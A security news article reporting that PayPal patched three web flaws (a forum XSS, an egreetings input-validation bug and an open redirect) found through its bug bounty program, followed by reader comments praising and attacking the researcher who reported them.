PayPal Fixes Trio of Remote-Access Vulnerabilities

PayPal has repaired three remote-access vulnerabilities found in different areas of its website, including a cross-site scripting (XSS) flaw on its PayPal Community Forum. All three flaws were submitted to PayPal’s Bug Bounty Program.Researcher Benjamin Kunz Mejri of Vulnerability-Lab reported the security vulnerabilities to PayPal in September; patches were released in late October according to an advisory posted this week to the Full Disclosure list.

Paypal patchPayPal has repaired three remote-access vulnerabilities found in different areas of its website, including a cross-site scripting (XSS) flaw on its PayPal Community Forum. All three flaws were submitted to PayPal’s Bug Bounty Program.

Researcher Benjamin Kunz Mejri of Vulnerability-Lab reported the security vulnerabilities to PayPal in September; patches were released in late October according to an advisory posted this week to the Full Disclosure list.

The XSS bug allows only the execution of client-side script and browser cookie hijacking, Mejri told Threatpost in an email. “Client-side forced requests are possible to external targets,” he said, adding this could lead to session hijacking and phishing attacks.

According to the advisory, the vulnerability was located in the add-tags function of the community forum page. Attackers could have replaced a standard value string with malicious code or a path to the attackers site.

“Normally it should not be possible to inject script code as foldername and replace it with more script code to crash with an unhandled exception,” the advisory said. “Attackers can inject on [the] client side when the exception-handling is bypassed via another validation vulnerability.”

An input validation vulnerability was also discovered on the egreetings Web service of PayPal’s Plaza Web-based application. Plaza is PayPal’s shopping application; an attacker would need to be logged in to be able to send a malicious greeting via PayPal’s outgoing mail server, Merij said. Malicious code could be injected into certain fields in the application and the victim could be subject to session hijacking or persistent Web-based attacks.

Finally, a vulnerability that could enable an attacker to redirect users of PayPal’s  content management system–customer, pro or seller accounts—was patched. Attackers can use a client-side request to send users to an external website.

“An attacker can redirect the victim over the original PayPal domain to malware or phishing sites,” Mejri said. “The potential consequence is a stolen PayPal account or external malicious redirects. Mostly users do not watch where the redirection location is when the domain request was processed through the original PayPal community domain.”

PayPal began its bug-bounty program in June. PayPal’s security team rates the severity of submitted vulnerabilities and the company determines payouts. PayPal said only cross-site scripting, cross-site request forgery, SQL injection and authentication bypass flaws are in scope for its program. Researchers must also give PayPal reasonable time to address the flaws in question.

Suggested articles

Discussion

  • Salem on

    Benjamin is a real epic hacker!

  • Kevin LSK on

    Benjamin dominates in all exploit portals because he is one of the best.
    He impress and also motivate me.

  • noob on

    hahaha. seriously? benjamin aka rem0ve is a big lamer! he knows nothing except copy&paste xss payloads, using hackbar to test for simple sqli and copy&pasting AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA into input fields to find BOFs! that's why everyone is hating vulnerability-lab.com! watch the followers of vulnerability-lab... VULNERABILITY-LAB REALLY SUCKS AND BLAME THE WHOLE SCENE!!!

     

  • Severin on

    Looks like you are stalking him to animate other people to hate him. He does amazing work for paypal, dell, barracuda networks, facebook and also microsoft. You say he destroy the scene, i say he repairs the scene by excluding useless people like you and evil moneymakers. He will win at the end without using a weapon even if you guys try to force him. I wish there would be more people like him. @severin

  • Mahmoud on

    Noob it's obvious to every one that you are Jealous from Bnjamen.. go home Nooob... :P

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.